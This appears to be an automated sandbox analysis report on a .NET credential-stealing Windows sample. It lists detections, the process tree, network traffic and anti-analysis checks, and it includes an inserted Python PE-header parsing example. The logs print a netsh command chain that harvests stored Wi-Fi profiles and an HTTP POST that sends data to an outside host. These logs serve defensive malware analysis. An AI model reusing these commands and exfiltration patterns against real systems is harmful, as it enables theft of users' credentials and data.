Windows Analysis Report
wssvZm9dNK.exe

Overview

General Information

Sample name: wssvZm9dNK.exe (renamed because the original name is a hash value)
Original sample name: 2c5697f085b66bec06e28ed6d24ec606.exe
Analysis ID: 1461765
MD5: 2c5697f085b66bec06e28ed6d24ec606
SHA1: a3910a0f75b328f996983847cfdcc5df85520e98
SHA256: 432dc35a995a5ba33b1f3887b3cc7804fcc3d5d2b1d4aec2664acaf20cb11bad

Detection

PXRECVOWEIWOEI Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w7x64
  • wssvZm9dNK.exe (PID: 2036 cmdline: "C:\Users\user\Desktop\wssvZm9dNK.exe" MD5: 2C5697F085B66BEC06E28ED6D24EC606)
    • cmd.exe (PID: 2964 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: AD7B9C14083B52BC532FBA5948342B98)
      • chcp.com (PID: 2776 cmdline: chcp 65001 MD5: 4436B1A16BDC58D2B3A5263F042C09B3)
      • netsh.exe (PID: 2712 cmdline: netsh wlan show profile MD5: 784A50A6A09C25F011C3143DDD68E729)
      • findstr.exe (PID: 2120 cmdline: findstr All MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
  • msiexec.exe (PID: 3040 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PXRECVOWEIWOEI | Yara detected PXRECVOWEIWOEI Stealer | Joe Security
00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: wssvZm9dNK.exe PID: 2036 | JoeSecurity_PXRECVOWEIWOEI | Yara detected PXRECVOWEIWOEI Stealer | Joe Security
Process Memory Space: wssvZm9dNK.exe PID: 2036 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: wssvZm9dNK.exe PID: 2036 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Source: DNS query -- Author: Brandon George (blog post), Thomas Patzke -- Data: Image: C:\Users\user\Desktop\wssvZm9dNK.exe, QueryName: icanhazip.com

Stealing of Sensitive Information

Source: Process started -- Author: Joe Security -- Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wssvZm9dNK.exe", ParentImage: C:\Users\user\Desktop\wssvZm9dNK.exe, ParentProcessId: 2036, ParentProcessName: wssvZm9dNK.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 2964, ProcessName: cmd.exe
No Snort rule has matched

            AV Detection

Source: wssvZm9dNK.exe -- Avira: detected
Source: wssvZm9dNK.exe -- ReversingLabs: Detection: 52%
Source: Submitted Sample -- Integrated Neural Analysis Model: Matched 100.0% probability
Source: wssvZm9dNK.exe -- Joe Sandbox ML: detected
Source: unknown -- HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown -- HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: wssvZm9dNK.exe -- Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic -- HTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf HTTP/1.1 [Host: whatismyipaddressnow.co] [Connection: Keep-Alive]
Source: global traffic -- HTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1 [Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883] [Host: whatismyipaddressnow.co] [Content-Length: 5169] [Connection: Keep-Alive]
Source: global traffic -- HTTP traffic detected: GET / HTTP/1.1 [Host: icanhazip.com] [Connection: Keep-Alive]
Source: global traffic -- HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 [Host: ip-api.com] [Connection: Keep-Alive]
Source: Joe Sandbox View -- IP Address: 208.95.112.1
Source: Joe Sandbox View -- IP Address: 188.114.97.3
Source: Joe Sandbox View -- ASN Name: TUT-ASUS
Source: Joe Sandbox View -- JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View -- JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- DNS query: name: whatismyipaddressnow.co
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- DNS query: name: icanhazip.com
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- DNS query: name: ip-api.com
Source: wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp -- String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic -- DNS traffic detected: DNS query: whatismyipaddressnow.co
Source: global traffic -- DNS traffic detected: DNS query: icanhazip.com
Source: global traffic -- DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
Source: global traffic -- DNS traffic detected: DNS query: ip-api.com
Source: unknown -- HTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1 [Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638548738767882883] [Host: whatismyipaddressnow.co] [Content-Length: 5169] [Connection: Keep-Alive]
Source: unknown -- Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown -- Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown -- Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown -- Network traffic detected: HTTP traffic on port 49167 -> 443
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\chcp.com -- Memory allocated: 770B0000 page execute and read and write
Source: wssvZm9dNK.exe, 00000000.00000000.351853550.0000000000240000.00000002.00000001.01000000.00000003.sdmp -- Binary or memory string: OriginalFilename50lip51sm.exeB vs wssvZm9dNK.exe
Source: wssvZm9dNK.exe, 00000000.00000002.400862104.00000000005D4000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: OriginalFilenameclr.dllT vs wssvZm9dNK.exe
Source: wssvZm9dNK.exe, 00000000.00000002.401400775.00000000035F9000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
Source: wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003410000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
Source: wssvZm9dNK.exe, 00000000.00000002.401905465.0000000005540000.00000004.08000000.00040000.00000000.sdmp -- Binary or memory string: OriginalFilenameR4tion4lism.exeB vs wssvZm9dNK.exe
Source: wssvZm9dNK.exe -- Binary or memory string: OriginalFilename50lip51sm.exeB vs wssvZm9dNK.exe
Source: classification engine -- Classification label: mal100.troj.spyw.evad.winEXE@10/9@6/4
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Mutant created: NULL
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Mutant created: \Sessions\1\BaseNamedObjects\632922
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- File created: C:\Users\user\AppData\Local\Temp\7xwghk55.default
Source: wssvZm9dNK.exe -- Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wssvZm9dNK.exe -- Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown -- Process created: C:\Users\user\Desktop\wssvZm9dNK.exe "C:\Users\user\Desktop\wssvZm9dNK.exe"
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: unknown -- Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: version.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: rasman.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: webio.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: credssp.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: secur32.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: amsi.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: rpcrtremote.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: wbemcomn2.dll
Source: C:\Users\user\Desktop\wssvZm9dNK.exe -- Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe -- Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe -- Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe -- Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\chcp.com -- Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\chcp.com -- Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\chcp.com -- Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: credui.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: odbc32.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: dhcpqec.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: qutil.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: ws2help.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: version.dll
Source: C:\Windows\SysWOW64\netsh.exe -- Section loaded: authfwcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nci.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: devrtl.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: napmontr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: certcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pcollab.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: wssvZm9dNK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: wssvZm9dNK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: wssvZm9dNK.exe, zerujudimabcounter.cs | .Net Code: zusukagabinajozazux System.Reflection.Assembly.Load(byte[])
            Source: wssvZm9dNK.exe, zerujudimabcounter.cs | .Net Code: zusukagabinajozazux
            Source: wssvZm9dNK.exe | Static PE information: TimeDateStamp 0x83FE105A [Sun Mar 4 09:20:26 2040 UTC]
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process information set: NOOPENFILEERRORBOX (59 occurrences)
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX (9 occurrences)
            Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
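            The static PE facts in this report (a COM descriptor data directory, the DllCharacteristics DYNAMIC_BASE, NX_COMPAT, NO_SEH and TERMINAL_SERVER_AWARE, and a TimeDateStamp of 0x83FE105A that decodes to March 2040) can be read straight from the header. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses those three fields from a minimal PE32 header that it constructs in memory (the header layout, section count, RVAs and machine type of that constructed image are assumptions; only the timestamp value and the flag names come from the report) and classifies the timestamp. The caveat a practitioner should keep in mind: a .NET assembly built with Roslyn's deterministic option carries a hash-derived TimeDateStamp, frequently with the high bit set and therefore decoding to a date after 2038, so a "future" timestamp on a CLR image is weak evidence of deliberate forgery on its own and should be read together with the unpacker and stealer findings rather than as an indicator in isolation.

```python
"""Static PE header triage: COFF TimeDateStamp, CLR (COM descriptor) data directory,
and DllCharacteristics flags, using only the standard library. The sample image is
constructed below for the example; it is not the report's binary."""
import struct
import time
from typing import Optional

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_pe_header(data: bytes) -> dict:
    """Return TimeDateStamp, DllCharacteristics and CLR-header presence from raw PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, timestamp, _, _, _, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset for PE32 and PE32+
    # Data directories start at +96 (PE32) or +112 (PE32+); NumberOfRvaAndSizes sits just before.
    dir_base = opt + (96 if magic == PE32_MAGIC else 112)
    num_dirs = struct.unpack_from("<I", data, dir_base - 4)[0]
    clr_rva = clr_size = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva, clr_size = struct.unpack_from(
            "<II", data, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    return {
        "machine": machine,
        "timestamp": timestamp,
        "dll_characteristics": dll_chars,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
    }


def decode_dll_characteristics(flags: int) -> list:
    """Names of the set DllCharacteristics bits, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if flags & bit]


def timestamp_to_utc(ts: int) -> str:
    return time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(ts))


def assess_timestamp(info: dict, now: Optional[float] = None) -> str:
    """'zero' (stripped), 'future', 'future-dotnet' (future on a CLR image, where a
    deterministic-build hash is the usual cause) or 'plausible'."""
    now = time.time() if now is None else now
    ts = info["timestamp"]
    if ts == 0:
        return "zero"
    if ts > now:
        return "future-dotnet" if info["is_dotnet"] else "future"
    return "plausible"


def build_sample_pe(timestamp: int, dll_chars: int, dotnet: bool = True) -> bytes:
    """Constructed minimal PE32 header (one section, x86) carrying the given fields."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    if dotnet:  # assumed RVA/size for the CLR header; any non-zero pair marks a .NET image
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    info = parse_pe_header(build_sample_pe(0x83FE105A, 0x8540))
    print("TimeDateStamp 0x%08X = %s" % (info["timestamp"], timestamp_to_utc(info["timestamp"])))
    print("DllCharacteristics:", ", ".join(decode_dll_characteristics(info["dll_characteristics"])))
    print(".NET image:", info["is_dotnet"], "verdict:", assess_timestamp(info))
```

            To apply it to a real file, pass `open(path, "rb").read()` to `parse_pe_header`; the flag value 0x8540 used for the constructed image is simply the four flags named in the report OR-ed together.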

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR
            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController (3 occurrences)
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Memory allocated: 1D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Memory allocated: 2370000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Memory allocated: 500000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Window / User API: threadDelayed 1561
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Window / User API: threadDelayed 8178
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2760 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2980 | Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2980 | Thread sleep time: -3000000s >= -30000s
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 1568 | Thread sleep count: 1561 > 30
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 1568 | Thread sleep count: 8178 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 2140 | Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\msiexec.exe TID: 3104 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Thread delayed: delay time: 600000
